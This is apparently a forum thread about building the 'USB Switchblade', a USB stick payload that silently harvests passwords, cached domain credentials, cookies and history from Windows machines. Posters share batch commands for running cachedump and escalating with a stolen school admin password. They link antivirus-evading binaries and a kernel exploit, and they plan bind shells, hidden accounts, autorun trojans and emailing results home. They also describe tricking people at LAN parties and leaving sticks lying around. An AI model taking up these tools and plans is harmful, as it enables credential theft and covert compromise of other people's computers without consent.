
USB Switchblade Development


Darren Kitchen


Hey, I made a very small modification to the stick.

First of all, I'm using this at school, but I magically got the admin password *cough ophcrack*, so I have modified it to run a batch file (I have a U3 but I don't use the U3 method, since you'd need to have admin privileges).

Here's my modified batch:

cd \WIP\CMD
runas /user:Administrator go.cmd < admin.txt

What this does is basically perform the Windows XP/2000 command which runs a program as a different user, and tell it to run the same go.cmd file, except as Administrator. The admin.txt file simply contains the password to log in with.

The second slight modification I made is that I added cachedump to the list of things to run. Cachedump basically does what pwdump2 does on the local computer, except it steals the cached domain credentials. I wasn't sure whether or not it would trip some virus scanners (tried the normal one with NOD32 and it didn't, but who knows), so I used "the brainkill method" of making it undetectable. The original file is here: http://www.off-by-one.net/misc/cachedump-1.2.zip and here's the one that is totally undetectable: http://unpluggedpodcast.com/spektormax/cachedump.exe Irongeek has a nice tutorial on using cachedump, as well as how to crack it with a modified version of John the Ripper or a semi-hack for Cain & Abel, here: http://www.irongeek.com/i.php?page=security/cachecrack

Here's my slightly modified go.cmd file that makes the cachedump results look nice:

... [continued from file] ... 

echo ***********[Dump URL History]******* >> \Documents\logfiles\%computername%.log 2>&1
echo ************************************ >> \Documents\logfiles\%computername%.log 2>&1
   cscript //nologo .\DUH.vbs >> \Documents\logfiles\%computername%.log 2>&1
echo ************************************ >> \Documents\logfiles\%computername%.log 2>&1
echo ***************[MS-CACHE]*********** >> \Documents\logfiles\%computername%.log 2>&1
echo ************************************ >> \Documents\logfiles\%computername%.log 2>&1
   .\cachedump.exe >> \Documents\logfiles\%computername%.log 2>&1
:End
exit



Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hiren's BootCD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's a very "nubish" utility, yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, it will reset the password for you with a few keystrokes. Badda-bing badda-boom, you're in the box with Administrator access.

I have not yet found a Windows machine it doesn't work on. The only drawback would be if someone has a CMOS/BIOS password on the box; you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

We've got something in the works. All I'll say. But that's another hack entirely. The idea behind this hack is that you can be at a LAN party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey, think I could get a copy of that album / expense report template / pr0n?" and bingo, you've got them to hack themselves.



We've got something in the works. All I'll say. But that's another hack entirely. The idea behind this hack is that you can be at a LAN party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey, think I could get a copy of that album / expense report template / pr0n?" and bingo, you've got them to hack themselves.

In that method, would it not just be easy to put a packaged trojan (like one of my favourites, CIA 1.3 (a classic :D)) and autorun it?

Those also have features like connecting to .... .no-ip.com etc. when connected to the net; you can even get it to mail you the IP address when someone gets online, and it doesn't get detected -> see http://hak5.org/forums/viewtopic.php?p=30398


I think we are going to need two different payloads, one stealth and one pwner. If you have someone who is tight into security and they see an account created, or something dropped on their computer, you're boned because now they're pissed and looking for you. But if you only take stuff off the computer there should be really no way to tell...


Hey all

When I put together the proof of concept U3 hack I wasn’t thinking it would get much attention so it is a bit primitive and kind of script kiddie. I gave it to Darren to see what he thought. I didn’t realise it would be so much fun to talk about and see Darren demo.

So I was thinking: how about we re-write it a bit better this time? I think it would be quite cool to evolve it a bit.

Some suggestions:

Works on U3 and USB

Automatic privilege escalation from any user to Admin

A real bind shell as well as the account adding and hiding.

Re-compile pwdump4 with new variables so none of the virus checkers find it.

A phone home option that can detect or create an SMTP server to send the results.

A switch to make it a passive as opposed to active hack.

Improve stealth and speed

Give it the ability to run bolt-ons, such as anything you guys can think of.

An automated switchblade build routine.

And so on…… Hmmm maybe my black hat is showing sorry. :oops:

OK, back to gray.

It might be fun to do it together with all the skills we have we could make an awesome tool.

I have already written some of the above and am happy to share.

My only reservation is I don't want this to turn into a real work-type project. Just a bit of fun, and maybe we could develop something that could be used in another segment.

What do you guys think?

_________________

MaxDamage

Max's Law: "Murphy was an Optimist!"

I'm with you.... and a way to switch it from passive to active and then back would really be helpful (sadly I know just about nothing about this, but I'd love to help, so if you can recommend some reading to bring my 1337 skillz up to where they need to be, that would be great; meanwhile, off to Google).

... Murphy was totally an optimist.


Anyone else getting this?

[screenshot of the error: errormt8.png]

It's picking up everything else; it's picking up whoever logged in last's password (I'm currently testing it out on my home network; I've tried on 2 boxes and am getting the same error), although it's not giving passwords for all accounts. I'm running the one which is intended for the U3, but just running directly off a STANDARD USB stick. Is this why I'm getting the error? The other hack doesn't seem to have a password grabber or account escalation facility. Sorry to sound so n00b ;)

Hope someone can help ...

-Kyle


We've got something in the works. All I'll say. But that's another hack entirely. The idea behind this hack is that you can be at a LAN party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey, think I could get a copy of that album / expense report template / pr0n?" and bingo, you've got them to hack themselves.

I understand the concept completely. It was just another suggestion to try if you really don't need/want the password to the box you're trying to pwn. I just like to give alternatives to the same solution.

Just trying to help :D


So obviously bigger is always better (at least in my opinion), but I was just wondering what size U3 stick everyone is running? Do the 256 MB U3 sticks work rather well, or is there just not enough room for all the fun stuff and then all those logs you've been packing on there? Are the 2 or 4 GB sticks just way too big and, dare I say it, overkill? Just wondering what the general consensus is on size before I go buying a bunch to leave lying around places.

Edit: also, what sizes are being used for the standard USB sticks? Got a couple of free 64 MB ones lying about.

-Sloth


I am not sure if this will help, I found a POC on the Sploitcast forums that looks promising.

http://www.milw0rm.com/exploits/1911

I am hoping this will be of some use to a real coder and help the project along.

:twisted:

:shock: Holy crap! Ring0 exploit. Remember that scene in Hackers where they're collectively attacking The Gibson, and that admin says "They're in the kernel"? That's what seems to be happening here.

Though it seems that by default the memory used is read-only protected, mitigating things somewhat.

I'm always fascinated by exploits like these. I mean, how the HELL did they figure out what IOCTL 0x141043 does? Or that it even existed for that matter...


So I don't have one of those spiffy U3 flash drives. So I'm using Amish's solution.

I've added onto it: retrieving the product key, listing open ports, things that run at startup, services, Mozilla cookie retrieval, network adapter info, installed Windows updates, running processes, Internet Explorer remembered passwords, blah blah blah...

But besides that, I'm wondering what I can use to get the LM hashes, like pwdump and so on. Can someone help me out with this? I'd like to be able to make the non-U3 drive compatible with the U3 drive, or at least get as much as I can out of it.

Oh and if anyone would like the version of Amish's solution that i made let me know I'll post it up.


Hey man I feel famous LOL. Seriously thanks for the credit Darren. 8)

When I developed the first payload it was just a proof of concept put together in half an hour as soon as I found out how to replace the U3 ISO. Anyway, since then I have written some more and refined it a bit. I have also got a bolt-on that silently finds the local SMTP server (or builds its own if directly connected) and emails the results.

So If you guys want to help develop it further I’m up for it. And if you need help getting it running then just ask :).

I also have a non-U3 version, something like Amish's, that I could add if you need it.

Yeah, if you could put up your non-U3 version; I don't have a U3 version. Please post your files!


Hello Everyone!!

New to the boards.. but i've been watching hak5 for quite some time

Now that the introductions are done :P

I was wondering if it would be possible to add a part to the batch file that would change a value in the local policy editor, specifically the one that sets the privileges back to classic, to open up doors for fastpush.


Hey, long time listener, first time poster (obviously).

Alright, I bought the SanDisk "Switchblade" 512 MB card and ran the U3 install thing. I copied the payload onto the flash drive, but the problem I have is the autorun will not work. So I go to reinstall it and I get an error.

When I view the CD drive created by the flash drive I cannot see the insides, because when I double-click on it I get an error "Cannot access drive, may be corrupt". Did I fubar my flash drive's U3 tech? Help!

The install error I get: "Reformatting of the smart drive failed, the drive may be unusable, you might be able to recover by rerunning this software"


Yet another first time poster, long time listener.

It seems we are all coming out of the woodwork for this one.

I have been having the same problem as other people on this forum; a few people earlier posted about a pwdump error. I had the same. On every PC I tried it on I received the following error:

Logon to \\127.0.0.1\ADMIN$ failed: code 53

The fix for this is simple, go to http://www.foofus.net/fizzgig/pwdump/ and get the latest pwdump, then replace the one on the key with the new one and run. It fixed the problem for me and it dumped my hashes happily.

I was using the encrypted payload that gets around Norton, I do not know whether norton picks this one up. I know that AVG does not however.

Oh and I have a feature request. If anyone can come up with this I will be very happy.

It should be possible to get the payload to dump Wireless Keys from the WZC service, so you can easily get WEP and WPA passwords. Cain & Abel does it but I was wondering if there was a way of doing it in the command line.


Hello Everyone!!

New to the boards.. but i've been watching hak5 for quite some time

Now that the introductions are done :P

I was wondering if it would be possible to add a part to the batch file that would change a value in the local policy editor, specifically the one that sets the privileges back to classic, to open up doors for fastpush.

Oh, I think I just read something about that today. I'll try searching and do an edit if I find it.

EDIT:

Yup here it is http://www.hak5.org/forums/viewtopic.php?t=2412

I have written the admin of the site to see if I can get anymore information about the tool.


First time posting , first time listening =)

I've got a question about this.... I personally have not tried out the payloads yet, but from what I have been reading, this requires administrator access, right? But in a real working corporate/school environment, just how many people would be logged in as root? We would need privilege escalation as well, right?

Could anyone point me to some existing privilege escalation payloads? I'm having some trouble finding existing packages.

( Sorry if im way off-target on this one . Forgive my n33bishness )



As Sunari was asking for the same thing: there doesn't seem to be one yet, at least that I am aware of.

I am currently trying to figure out a way to do that to the non U3 version

